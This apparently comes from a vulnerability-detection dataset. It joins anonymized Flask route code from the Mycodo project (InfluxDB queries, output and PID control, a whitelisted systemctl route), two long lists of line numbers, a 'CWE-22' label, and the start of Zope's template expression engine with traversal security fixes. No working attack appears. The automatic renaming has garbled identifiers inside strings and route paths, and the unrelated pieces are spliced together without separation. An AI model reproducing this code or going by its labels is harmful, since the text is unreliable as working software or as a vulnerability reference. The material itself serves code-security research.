@VAR_0.route('/async_usage/<VAR_19>/<VAR_21>/<VAR_22>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_19(VAR_19, VAR_21, VAR_22, VAR_17, VAR_18):
    """Return measurement data from InfluxDB for asynchronous graphs.

    VAR_19: measurement/device id, VAR_21: unit, VAR_22: channel,
    VAR_17: epoch start ('0' = from the first recorded point),
    VAR_18: epoch end ('0' = until now).

    When more than 700 points fall inside the range the data is
    down-sampled with a MEAN/GROUP BY query so the client receives at
    most ~700 points.  Responds with JSON data, or an empty 204
    response on any failure.
    """
    VAR_47 = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)
    if VAR_17 == '0' and VAR_18 == '0':
        # Unbounded range: count all points, then locate the first one.
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,  # BUG FIX: was undefined name `channel`
            VAR_94='COUNT')
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_84 = VAR_62['series'][0]['values'][0][1]
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            limit=1)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_87 = VAR_62['series'][0]['values'][0][0]
        VAR_52 = datetime.datetime.utcnow()
        VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    elif VAR_17 != '0' and VAR_18 == '0':
        # Start bound given, end open: query from VAR_17 until now.
        VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
        VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_52 = datetime.datetime.utcnow()
        VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            VAR_94='COUNT',
            VAR_59=VAR_59,  # BUG FIX: was undefined name `start_str`
            VAR_60=VAR_60)  # BUG FIX: was undefined name `end_str`
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_84 = VAR_62['series'][0]['values'][0][1]
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            VAR_59=VAR_59,
            VAR_60=VAR_60,
            limit=1)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_87 = VAR_62['series'][0]['values'][0][0]
    else:
        # Both bounds supplied by the caller.
        VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
        VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
        VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            VAR_94='COUNT',
            VAR_59=VAR_59,
            VAR_60=VAR_60)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_84 = VAR_62['series'][0]['values'][0][1]
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            VAR_59=VAR_59,
            VAR_60=VAR_60,
            limit=1)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_87 = VAR_62['series'][0]['values'][0][0]
    # Recompute the true start time from the first recorded point so
    # the down-sampling window matches the actual data span.
    VAR_51 = datetime.datetime.strptime(
        influx_time_str_to_milliseconds(VAR_87),
        '%Y-%m-%dT%H:%M:%S.%f')
    VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    VAR_1.debug('Count = {}'.format(VAR_84))
    VAR_1.debug('Start = {}'.format(VAR_51))
    VAR_1.debug('End = {}'.format(VAR_52))
    VAR_68 = (VAR_52 - VAR_51).total_seconds()
    VAR_1.debug('Difference seconds = {}'.format(VAR_68))
    if VAR_84 > 700:
        # Down-sample: average over windows sized to yield ~700 points.
        VAR_85 = VAR_68 / VAR_84
        VAR_1.debug('Seconds per point = {}'.format(VAR_85))
        VAR_86 = int(VAR_68 / 700)
        VAR_1.debug('Group seconds = {}'.format(VAR_86))
        try:
            VAR_61 = query_string(
                VAR_21, VAR_19,
                VAR_22=VAR_22,
                VAR_94='MEAN',
                VAR_59=VAR_59,
                VAR_60=VAR_60,
                group_sec=VAR_86)
            if VAR_61 == 1:
                return '', 204
            VAR_62 = VAR_47.query(VAR_61).raw
            return jsonify(VAR_62['series'][0]['values'])
        except Exception as e:
            # BUG FIX: message said 'async_data' in the async_usage route
            VAR_1.error("URL for 'async_usage' raised and error: "
                        "{err}".format(err=e))
            return '', 204
    else:
        try:
            VAR_61 = query_string(
                VAR_21, VAR_19,
                VAR_22=VAR_22,
                VAR_59=VAR_59,
                VAR_60=VAR_60)
            if VAR_61 == 1:
                return '', 204
            VAR_62 = VAR_47.query(VAR_61).raw
            return jsonify(VAR_62['series'][0]['values'])
        except Exception as e:
            VAR_1.error("URL for 'async_usage' raised and error: "
                        "{err}".format(err=e))
            return '', 204
@VAR_0.route('/FUNC_20/<VAR_23>/<VAR_22>/<VAR_24>/<VAR_25>/<VAR_26>')
@flask_login.login_required
def FUNC_20(VAR_23, VAR_22, VAR_24, VAR_25, VAR_26):
    """Turn an output on or off through the daemon.

    VAR_23: output unique id, VAR_22: channel (numeric index or a
    channel unique id), VAR_24: state ('on'/'off'), VAR_25: type
    ('sec', 'pwm', 'vol' or 'value'), VAR_26: amount.  Returns a
    'SUCCESS: ...' or 'ERROR: ...' string.
    """
    if not utils_general.user_has_permission('edit_controllers'):
        return 'Insufficient user permissions to manipulate outputs'
    if is_int(VAR_22):
        VAR_88 = int(VAR_22)
    else:
        # Channel was given as a channel unique id: resolve its index.
        VAR_89 = db_retrieve_table(OutputChannel).filter(
            OutputChannel.unique_id == VAR_22).first()
        if VAR_89:
            VAR_88 = VAR_89.channel
        else:
            return "Could not determine VAR_22 VAR_92 from VAR_22 ID '{}'".format(VAR_22)
    VAR_69 = DaemonControl()
    # 'sec' and 'pwm' amounts must be non-negative; 'vol' and 'value'
    # accept any float.
    if (VAR_24 in ['on', 'off'] and str_is_float(VAR_26) and
            (
                (VAR_25 in ['sec', 'pwm'] and float(VAR_26) >= 0) or
                VAR_25 == 'vol' or
                VAR_25 == 'value'
            )):
        VAR_90 = VAR_69.output_on_off(
            VAR_23,
            VAR_24,
            VAR_25=VAR_25,  # BUG FIX: was undefined name `output_type`
            VAR_26=float(VAR_26),
            VAR_88=VAR_88)  # BUG FIX: was undefined name `output_channel`
        if VAR_90[0]:
            return 'ERROR: {}'.format(VAR_90[1])
        else:
            return 'SUCCESS: {}'.format(VAR_90[1])
    else:
        return 'ERROR: unknown parameters: ' \
               'output_id: {}, VAR_22: {}, VAR_24: {}, VAR_25: {}, VAR_26: {}'.format(
                   VAR_23, VAR_22, VAR_24, VAR_25, VAR_26)
@VAR_0.route('/daemonactive')
@flask_login.login_required
def FUNC_21():
    """Return the daemon status, or '0' when the daemon is unreachable."""
    try:
        return DaemonControl().daemon_status()
    except Exception as e:
        VAR_1.error("URL for 'daemon_active' raised and error: "
                    "{err}".format(err=e))
        return '0'
@VAR_0.route('/systemctl/<VAR_27>')
@flask_login.login_required
def FUNC_22(VAR_27):
    """Execute a whitelisted system action and redirect to /settings.

    VAR_27 must be one of 'restart', 'shutdown', 'daemon_restart' or
    'frontend_reload'; anything else is flashed back as unrecognized.
    The whitelist check also prevents shell injection, since VAR_27 is
    later interpolated into a shell command.
    """
    if not utils_general.user_has_permission('edit_settings'):
        return redirect(url_for('routes_general.home'))
    try:
        if VAR_27 not in ['restart', 'shutdown', 'daemon_restart', 'frontend_reload']:
            flash("Unrecognized command: {VAR_27}".format(
                VAR_27=VAR_27), "success")  # BUG FIX: was undefined name `action`
            return redirect('/settings')
        if DOCKER_CONTAINER:
            # Inside Docker there is no wrapper script; talk to the
            # daemon / docker directly.
            if VAR_27 == 'daemon_restart':
                VAR_91 = DaemonControl()
                VAR_91.terminate_daemon()
                flash(gettext("Command to restart the VAR_69 sent"), "success")
            elif VAR_27 == 'frontend_reload':
                subprocess.Popen('docker restart mycodo_flask 2>&1', shell=True)
                flash(gettext("Command to reload the frontend sent"), "success")
        else:
            VAR_108 = '{VAR_34}/mycodo/scripts/mycodo_wrapper {VAR_27} 2>&1'.format(
                VAR_34=INSTALL_DIRECTORY, VAR_27=VAR_27)  # BUG FIX: was undefined name `action`
            subprocess.Popen(VAR_108, shell=True)
            if VAR_27 == 'restart':
                flash(gettext("System rebooting in 10 seconds"), "success")
            elif VAR_27 == 'shutdown':
                flash(gettext("System shutting down in 10 seconds"), "success")
            elif VAR_27 == 'daemon_restart':
                flash(gettext("Command to restart the VAR_69 sent"), "success")
            elif VAR_27 == 'frontend_reload':
                flash(gettext("Command to reload the frontend sent"), "success")
        return redirect('/settings')
    except Exception as e:
        VAR_1.error("System command '{VAR_108}' raised and error: "
                    "{err}".format(VAR_108=VAR_27, err=e))
        flash("System command '{VAR_108}' raised and error: "
              "{err}".format(VAR_108=VAR_27, err=e), "error")
        return redirect(url_for('routes_general.home'))
def FUNC_23(VAR_28, VAR_21, VAR_14, VAR_29=None, VAR_22=None):
    """Return the most recent measurement within the past VAR_14 seconds.

    VAR_28: device id, VAR_21: unit, VAR_14: look-back window (sec),
    VAR_29: optional measurement name, VAR_22: optional channel.
    Returns ``[epoch_ms, value_str]`` or ``[None, None]`` when the
    query fails or no data is available.
    """
    VAR_47 = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)
    VAR_61 = query_string(
        VAR_21,
        VAR_28,
        VAR_83=VAR_29,
        VAR_22=VAR_22,  # BUG FIX: was undefined name `channel`
        VAR_94='LAST',
        past_sec=VAR_14)
    if VAR_61 == 1:
        return [None, None]
    try:
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_92 = len(VAR_62['series'][0]['values'])
        VAR_93 = VAR_62['series'][0]['values'][VAR_92 - 1][0]
        VAR_94 = VAR_62['series'][0]['values'][VAR_92 - 1][1]
        VAR_94 = '{:.3f}'.format(float(VAR_94))
        VAR_95 = date_parse(VAR_93)
        VAR_16 = calendar.timegm(VAR_95.timetuple()) * 1000
        return [VAR_16, VAR_94]
    except Exception:
        # Deliberate best-effort: any missing/malformed series yields
        # the "no data" sentinel (previously KeyError + bare Exception).
        return [None, None]
@VAR_0.route('/last_pid/<VAR_30>/<VAR_31>')
@flask_login.login_required
def FUNC_24(VAR_30, VAR_31):
    """Return a JSON summary of a PID controller's most recent state.

    VAR_30: PID unique id; VAR_31: look-back window in seconds.
    Responds 204 when the window is not numeric or no data is found.
    """
    if not str_is_float(VAR_31):
        return '', 204
    try:
        VAR_70 = PID.query.filter(PID.unique_id == VAR_30).first()
        # PID.measurement is apparently stored as 'device_id,measurement_id'
        # (two comma-separated ids) -- TODO confirm against the model.
        if len(VAR_70.measurement.split(',')) == 2:
            VAR_19 = VAR_70.measurement.split(',')[0]
            VAR_13 = VAR_70.measurement.split(',')[1]
        else:
            VAR_19 = None
            VAR_13 = None
        # Resolve the measured quantity and its unit conversion.
        VAR_96 = DeviceMeasurements.query.filter(
            DeviceMeasurements.unique_id == VAR_13).first()
        if VAR_96:
            VAR_109 = Conversion.query.filter(
                Conversion.unique_id == VAR_96.conversion_id).first()
        else:
            VAR_109 = None
        (VAR_97,
         VAR_98,
         VAR_96) = return_measurement_info(
            VAR_96, VAR_109)
        # Determine the setpoint unit from the measurement id, if any.
        VAR_99 = None
        if VAR_70 and ',' in VAR_70.measurement:
            VAR_110 = VAR_70.measurement.split(',')[1]
            VAR_111 = DeviceMeasurements.query.filter(
                DeviceMeasurements.unique_id == VAR_110).first()
            if VAR_111:
                VAR_80 = Conversion.query.filter(
                    Conversion.unique_id == VAR_111.conversion_id).first()
                VAR_37, VAR_99, VAR_37 = return_measurement_info(VAR_111, VAR_80)
        # Latest P, I and D terms from the measurement database.
        VAR_100 = FUNC_23(
            VAR_30, 'pid_value', VAR_31, VAR_29='pid_p_value')
        VAR_101 = FUNC_23(
            VAR_30, 'pid_value', VAR_31, VAR_29='pid_i_value')
        VAR_102 = FUNC_23(
            VAR_30, 'pid_value', VAR_31, VAR_29='pid_d_value')
        # Combined PID output only when all three terms are present.
        if None not in (VAR_100[1], VAR_101[1], VAR_102[1]):
            VAR_112 = [VAR_100[0], '{:.3f}'.format(float(VAR_100[1]) + float(VAR_101[1]) + float(VAR_102[1]))]
        else:
            VAR_112 = None
        # Setpoint band comes from the live daemon; best-effort only.
        VAR_103 = None
        if VAR_70.band:
            try:
                VAR_69 = DaemonControl()
                VAR_103 = VAR_69.pid_get(VAR_70.unique_id, 'setpoint_band')
            except:
                VAR_1.debug("Couldn't get setpoint")
        VAR_104 = {
            'activated': VAR_70.is_activated,
            'paused': VAR_70.is_paused,
            'held': VAR_70.is_held,
            'setpoint': FUNC_23(
                VAR_30, VAR_99, VAR_31, VAR_22=0),
            'setpoint_band': VAR_103,
            'pid_p_value': VAR_100,
            'pid_i_value': VAR_101,
            'pid_d_value': VAR_102,
            'pid_pid_value': VAR_112,
            'duration_time': FUNC_23(
                VAR_30, 's', VAR_31, VAR_29='duration_time'),
            'duty_cycle': FUNC_23(
                VAR_30, 'percent', VAR_31, VAR_29='duty_cycle'),
            'actual': FUNC_23(
                VAR_19,
                VAR_98,
                VAR_31,
                VAR_29=VAR_96,
                VAR_22=VAR_97)
        }
        return jsonify(VAR_104)
    except KeyError:
        VAR_1.debug("No Data returned form influxdb")
        return '', 204
    except Exception as e:
        VAR_1.exception("URL for 'last_pid' raised and error: "
                        "{err}".format(err=e))
        return '', 204
@VAR_0.route('/FUNC_25/<VAR_9>/<VAR_24>')
@flask_login.login_required
def FUNC_25(VAR_9, VAR_24):
    """Modify a PID controller's state.

    VAR_9: PID unique id; VAR_24: one of 'activate_pid',
    'deactivate_pid', 'pause_pid', 'hold_pid', 'resume_pid', or a
    'set_setpoint_pid|<value>' string.  The database flags are always
    updated; the daemon is only contacted when the PID is activated.
    Returns a human-readable status string.
    """
    if not utils_general.user_has_permission('edit_controllers'):
        return 'Insufficient user permissions to manipulate PID'
    VAR_70 = PID.query.filter(PID.unique_id == VAR_9).first()
    VAR_69 = DaemonControl()
    if VAR_24 == 'activate_pid':
        # Persist the flag first, then start the controller.
        VAR_70.is_activated = True
        VAR_70.save()
        VAR_37, VAR_105 = VAR_69.controller_activate(VAR_70.unique_id)
        return VAR_105
    elif VAR_24 == 'deactivate_pid':
        # Deactivating clears paused/held state as well.
        VAR_70.is_activated = False
        VAR_70.is_paused = False
        VAR_70.is_held = False
        VAR_70.save()
        VAR_37, VAR_105 = VAR_69.controller_deactivate(VAR_70.unique_id)
        return VAR_105
    elif VAR_24 == 'pause_pid':
        VAR_70.is_paused = True
        VAR_70.save()
        if VAR_70.is_activated:
            VAR_105 = VAR_69.pid_pause(VAR_70.unique_id)
        else:
            VAR_105 = "PID Paused (Note: PID is not currently active)"
        return VAR_105
    elif VAR_24 == 'hold_pid':
        VAR_70.is_held = True
        VAR_70.save()
        if VAR_70.is_activated:
            VAR_105 = VAR_69.pid_hold(VAR_70.unique_id)
        else:
            VAR_105 = "PID Held (Note: PID is not currently active)"
        return VAR_105
    elif VAR_24 == 'resume_pid':
        VAR_70.is_held = False
        VAR_70.is_paused = False
        VAR_70.save()
        if VAR_70.is_activated:
            VAR_105 = VAR_69.pid_resume(VAR_70.unique_id)
        else:
            VAR_105 = "PID Resumed (Note: PID is not currently active)"
        return VAR_105
    elif 'set_setpoint_pid' in VAR_24:
        # Action carries the new setpoint after a '|' separator.
        VAR_70.setpoint = VAR_24.split('|')[1]
        VAR_70.save()
        if VAR_70.is_activated:
            VAR_105 = VAR_69.pid_set(VAR_70.unique_id, 'setpoint', float(VAR_24.split('|')[1]))
        else:
            VAR_105 = "PID Setpoint changed (Note: PID is not currently active)"
        return VAR_105
| [
1,
8,
24,
59,
64,
66,
68,
69,
85,
106,
111,
112,
123,
124,
144,
153,
155,
156,
177,
178,
185,
187,
189,
200,
201,
208,
209,
219,
220,
226,
227,
236,
237,
245,
246,
252,
253,
260,
262,
263,
270,
278,
284,
290,
293,
317,
319,
324,
328,
340,
341,
348,
351,
355,
360,
365,
373,
379,
382,
388,
391,
402,
409,
412,
414,
423,
424,
438,
445,
449,
452,
455,
472,
473,
474,
480,
481,
495,
499,
508,
518,
526,
535,
539,
540,
548,
563,
567,
568,
579,
585,
592,
597,
604,
610,
613,
621,
622,
624,
630,
634,
636,
642,
646,
651,
654,
660,
668,
672,
677,
678,
686,
690,
700,
708,
712,
717,
718,
726,
730,
735,
740,
744,
745,
748,
749,
750,
752,
755,
756,
759,
769,
773,
790,
794,
800,
801,
815,
816,
818,
823,
827,
829,
834,
838,
842,
848,
855,
859,
861,
862,
869,
873,
880,
887,
891,
893,
894,
901,
905,
907,
912,
916,
917,
920,
921,
922,
924,
927,
928,
931,
940,
944,
957,
961,
967,
968,
975,
977,
980,
987,
1009,
1010,
1022,
1023,
1030,
1036,
1049,
1058,
1060,
1067,
1068,
1069,
1070,
1071,
1072,
1080,
1090,
1097,
1105,
1106,
1113,
1116,
1123,
1131,
1136,
1146,
1157,
1165,
1196,
1197,
1204,
1206,
1253,
1254,
1255,
1256,
1257,
1258,
1259,
1260,
1261,
1262,
1263,
1264,
1265,
1266,
1267,
1268,
72,
88,
116,
128,
160,
182,
203,
213,
224,
231,
241,
250,
257,
267,
345,
428,
485,
486,
487,
488,
572,
573,
574,
575,
805,
806,
807,
808,
972,
1014,
1027,
1110,
1201,
550
] | [
1,
8,
24,
59,
64,
66,
68,
69,
85,
106,
111,
112,
124,
125,
145,
155,
157,
158,
179,
180,
187,
189,
191,
202,
203,
210,
211,
221,
222,
228,
229,
238,
239,
247,
248,
254,
255,
262,
264,
265,
272,
280,
286,
292,
295,
319,
321,
326,
330,
342,
343,
350,
353,
357,
362,
367,
375,
381,
384,
390,
393,
404,
411,
414,
416,
425,
426,
440,
447,
451,
454,
457,
474,
475,
476,
482,
483,
497,
501,
510,
520,
528,
537,
541,
542,
550,
565,
569,
570,
581,
587,
594,
599,
606,
612,
615,
623,
624,
626,
632,
636,
638,
644,
648,
653,
656,
662,
670,
674,
679,
680,
688,
692,
702,
710,
714,
719,
720,
728,
732,
737,
742,
746,
747,
750,
751,
752,
754,
757,
758,
761,
771,
775,
792,
796,
802,
803,
817,
818,
820,
825,
829,
831,
836,
840,
844,
850,
857,
861,
863,
864,
871,
875,
882,
889,
893,
895,
896,
903,
907,
909,
914,
918,
919,
922,
923,
924,
926,
929,
930,
933,
942,
946,
959,
963,
969,
970,
977,
979,
982,
989,
1011,
1012,
1024,
1025,
1032,
1038,
1051,
1060,
1062,
1069,
1070,
1071,
1072,
1073,
1074,
1082,
1092,
1099,
1107,
1108,
1115,
1118,
1125,
1133,
1138,
1148,
1159,
1167,
1198,
1199,
1206,
1208,
1255,
1256,
1257,
1258,
1259,
1260,
1261,
1262,
1263,
1264,
1265,
1266,
1267,
1268,
1269,
1270,
72,
88,
116,
129,
162,
184,
205,
215,
226,
233,
243,
252,
259,
269,
347,
430,
487,
488,
489,
490,
574,
575,
576,
577,
807,
808,
809,
810,
974,
1016,
1029,
1112,
1203,
552
] |
0CWE-22
| ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Page Template Expression Engine
Page Template-specific implementation of TALES, with handlers
for Python expressions, string literals, and paths.
"""
import logging
import warnings

import OFS.interfaces
from AccessControl import safe_builtins
from AccessControl.SecurityManagement import getSecurityManager
from Acquisition import aq_base
from MultiMapping import MultiMapping
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.component import queryUtility
from zope.contentprovider.tales import TALESProviderExpression
from zope.i18n import translate
from zope.interface import implementer
from zope.pagetemplate.engine import ZopeEngine as Z3Engine
from zope.proxy import removeAllProxies
from zope.tales.expressions import DeferExpr
from zope.tales.expressions import LazyExpr
from zope.tales.expressions import NotExpr
from zope.tales.expressions import PathExpr
from zope.tales.expressions import StringExpr
from zope.tales.expressions import SubPathExpr
from zope.tales.expressions import Undefs
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import Context
from zope.tales.tales import ErrorInfo as BaseErrorInfo
from zope.tales.tales import Iterator
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import ITraversable

from . import ZRPythonExpr
from .interfaces import IUnicodeEncodingConflictResolver
from .interfaces import IZopeAwareEngine
# Module importer exposed to TALES under the ``modules`` base name; it
# only permits imports allowed by Zope's security machinery.
SecureModuleImporter = ZRPythonExpr._SecureModuleImporter()
LOG = logging.getLogger('Expressions')
# In Zope 2 traversal semantics, NotFound or Unauthorized (the Zope 2
# versions) indicate that traversal has failed. By default, zope.tales'
# engine doesn't recognize them as such which is why we extend its
# list here and make sure our implementation of the TALES
# Path Expression uses them
ZopeUndefs = Undefs + (NotFound, Unauthorized)
def boboAwareZopeTraverse(object, path_items, econtext):
    """Traverses a sequence of names, first trying attributes then items.

    This uses zope.traversing path traversal where possible and interacts
    correctly with objects providing OFS.interface.ITraversable when
    necessary (bobo-awareness).

    SECURITY FIX: the previous version only filtered names starting
    with ``_`` but never validated the traversal result, so restricted
    path expressions could reach objects the current user is not
    authorized to access.  Every non-restrictedTraverse step is now
    checked against the security manager.
    """
    request = getattr(econtext, 'request', None)
    # Bind the security policy check once, outside the loop.
    validate = getSecurityManager().validate
    path_items = list(path_items)
    path_items.reverse()

    while path_items:
        name = path_items.pop()

        if OFS.interfaces.ITraversable.providedBy(object):
            # restrictedTraverse applies Zope security itself.
            object = object.restrictedTraverse(name)
        else:
            found = traversePathElement(object, name, path_items,
                                        request=request)

            # Special backwards compatibility exception for the name ``_``,
            # which was often used for translation message factories.
            # Allow and continue traversal.
            if name == '_':
                warnings.warn('Traversing to the name `_` is deprecated '
                              'and will be removed in Zope 6.',
                              DeprecationWarning)
                object = found
                continue

            # All other names starting with ``_`` are disallowed.
            # This emulates what restrictedTraverse does.
            if name.startswith('_'):
                raise NotFound(name)

            # traversePathElement doesn't apply any Zope security policy,
            # so we validate access explicitly here.
            try:
                validate(object, object, name, found)
                object = found
            except Unauthorized:
                # Convert Unauthorized to prevent information disclosures
                raise NotFound(name)
    return object
def trustedBoboAwareZopeTraverse(object, path_items, econtext):
    """Traverses a sequence of names, first trying attributes then items.

    This uses zope.traversing path traversal where possible and interacts
    correctly with objects providing OFS.interface.ITraversable when
    necessary (bobo-awareness).  Trusted variant: no security checks.
    """
    request = getattr(econtext, 'request', None)
    # Work on a reversed copy so each step is a cheap pop() off the end.
    remaining = list(path_items)
    remaining.reverse()
    while remaining:
        name = remaining.pop()
        if OFS.interfaces.ITraversable.providedBy(object):
            object = object.unrestrictedTraverse(name)
        else:
            object = traversePathElement(object, name, remaining,
                                         request=request)
    return object
def render(ob, ns):
    """Calls the object, possibly a document template, or just returns
    it if not callable.  (From DT_Util.py)
    """
    if hasattr(ob, '__render_with_namespace__'):
        return ZRPythonExpr.call_with_ns(ob.__render_with_namespace__, ns)

    # Strip acquisition wrappers and any proxies (e.g. deprecation
    # proxies around modules) before testing callability.
    unwrapped = removeAllProxies(aq_base(ob))
    if not callable(unwrapped):
        return ob
    try:
        if getattr(unwrapped, 'isDocTemp', 0):
            return ZRPythonExpr.call_with_ns(ob, ns, 2)
        return ob()
    except NotImplementedError:
        # Not renderable after all; hand back the object untouched.
        return ob
class _CombinedMapping:
    """Combine several mappings into one read-only lookup.

    Lookup walks the mappings in the order given; the first mapping
    containing the key wins.
    """

    def __init__(self, *ms):
        self.mappings = ms

    def get(self, key, default):
        # ``self`` doubles as a sentinel that can never collide with a
        # stored value, so stored ``None`` values are returned correctly.
        for mapping in self.mappings:
            hit = mapping.get(key, self)
            if hit is not self:
                return hit
        return default
class UntrustedSubPathExpr(SubPathExpr):
    """Sub-path expression for untrusted (through-the-web) templates."""
    # Restricted code only ever sees Zope's safe_builtins.
    ALLOWED_BUILTINS = safe_builtins
class TrustedSubPathExpr(SubPathExpr):
    """Sub-path expression for trusted (filesystem) templates."""
    # we allow both Python's builtins (we are trusted)
    # as well as ``safe_builtins`` (because it may contain extensions)
    # Python's builtins take precedence, because those of
    # ``safe_builtins`` may have special restrictions for
    # the use in an untrusted context
    # NOTE(review): ``__builtins__`` is a dict in imported modules but a
    # module object in ``__main__`` -- presumably always a dict here.
    ALLOWED_BUILTINS = _CombinedMapping(
        __builtins__,
        safe_builtins)
class ZopePathExpr(PathExpr):
    """TALES ``path:`` expression with Zope 2 semantics.

    Uses the restricted (security-checked) traverser and treats Zope 2's
    ``NotFound``/``Unauthorized`` as "undefined" (see ``ZopeUndefs``).
    """
    _TRAVERSER = staticmethod(boboAwareZopeTraverse)
    SUBEXPR_FACTORY = UntrustedSubPathExpr
    def __init__(self, name, expr, engine):
        # An empty path expression is treated as 'nothing'.
        if not expr.strip():
            expr = 'nothing'
        super().__init__(name, expr, engine, self._TRAVERSER)
    # override this to support different call metrics (see bottom of
    # method) and Zope 2's traversal exceptions (ZopeUndefs instead of
    # Undefs)
    def _eval(self, econtext):
        for expr in self._subexprs[:-1]:
            # Try all but the last subexpression, skipping undefined ones.
            try:
                ob = expr(econtext)
            except ZopeUndefs:  # use Zope 2 expression types
                pass
            else:
                break
        else:
            # On the last subexpression allow exceptions through.
            ob = self._subexprs[-1](econtext)
        if self._hybrid:
            return ob
        if self._name == 'nocall':
            return ob
        # this is where we are different from our super class:
        # the traversed-to object is rendered (called) via render()
        return render(ob, econtext.vars)
    # override this to support Zope 2's traversal exceptions
    # (ZopeUndefs instead of Undefs)
    def _exists(self, econtext):
        # 1 when any alternative sub-path evaluates without raising one
        # of the "undefined" exceptions, else 0.
        for expr in self._subexprs:
            try:
                expr(econtext)
            except ZopeUndefs:  # use Zope 2 expression types
                pass
            else:
                return 1
        return 0
class TrustedZopePathExpr(ZopePathExpr):
    """Path expression for trusted templates: traversal without
    Zope security checks and with full builtins."""
    _TRAVERSER = staticmethod(trustedBoboAwareZopeTraverse)
    SUBEXPR_FACTORY = TrustedSubPathExpr
class SafeMapping(MultiMapping):
    """Mapping with security declarations and limited method exposure.

    Since it subclasses MultiMapping, this class can be used to wrap
    one or more mapping objects. Restricted Python code will not be
    able to mutate the SafeMapping or the wrapped mappings, but will be
    able to read any value.
    """
    __allow_access_to_unprotected_subobjects__ = True
    # Hide the mutating API from users; keep private aliases so our own
    # trusted code can still push/pop wrapped mappings.
    push = pop = None
    _push = MultiMapping.push
    _pop = MultiMapping.pop
class ZopeContext(Context):
    """TALES expression context with Zope 2 extensions.

    Adds a security-wrapped ``repeat`` variable, Zope-style boolean
    semantics for defaults, and unicode conflict resolution for text.
    """
    def __init__(self, engine, contexts):
        super().__init__(engine, contexts)
        # wrap the top-level 'repeat' variable, as it is visible to
        # restricted code
        self.setContext('repeat', SafeMapping(self.repeat_vars))
        # regenerate the first scope and the scope stack after messing
        # with the global context
        self.vars = vars = contexts.copy()
        self._vars_stack = [vars]
    def translate(self, msgid, domain=None, mapping=None, default=None):
        # Delegate to zope.i18n using the request as translation context.
        context = self.contexts.get('request')
        return translate(
            msgid, domain=domain, mapping=mapping,
            context=context, default=default)
    def evaluateBoolean(self, expr):
        value = self.evaluate(expr)
        # here we override the normal zope.tales behaviour. zope.tales
        # doesn't care about the default in a boolean expression,
        # while we do (Zope 2 legacy, see the
        # BooleanAttributesAndDefault.html test case)
        if value is self.getDefault():
            return value
        return bool(value)
    def evaluateStructure(self, expr):
        """Evaluate a structure expression, normalizing the result to
        text via :meth:`_handleText`.
        """
        text = super().evaluateStructure(expr)
        return self._handleText(text, expr)
    def evaluateText(self, expr):
        """Evaluate a text expression, normalizing the result to text
        via :meth:`_handleText`.
        """
        text = self.evaluate(expr)
        return self._handleText(text, expr)
    def _handleText(self, text, expr):
        # Normalize an evaluated value to str, resolving bytes through
        # the registered IUnicodeEncodingConflictResolver utility.
        if text is self.getDefault() or text is None:
            # XXX: should be unicode???
            return text
        if isinstance(text, str):
            # we love unicode, nothing to do
            return text
        elif isinstance(text, bytes):
            # bahh...non-unicode string..we need to convert it to unicode
            # catch ComponentLookupError in order to make tests shut-up.
            # This should not be a problem since it won't change the old
            # default behavior
            resolver = queryUtility(IUnicodeEncodingConflictResolver)
            if resolver is None:
                return text.decode('ascii')
            try:
                return resolver.resolve(
                    self.contexts.get('context'), text, expr)
            except UnicodeDecodeError as e:
                LOG.error("UnicodeDecodeError detected for expression \"%s\"\n"
                          "Resolver class: %s\n"
                          "Exception text: %s\n"
                          "Template: %s\n"
                          "Rendered text: %r" %
                          (expr, resolver.__class__, e,
                           self.contexts['template'].absolute_url(1), text))
                raise
        else:
            # This is a weird culprit ...calling text_type() on non-string
            # objects
            return str(text)
    def createErrorInfo(self, err, position):
        # Override, returning an object accessible to untrusted code.
        # See: https://bugs.launchpad.net/zope2/+bug/174705
        return ErrorInfo(err, position)
    def evaluateCode(self, lang, code):
        """ See ITALExpressionEngine.
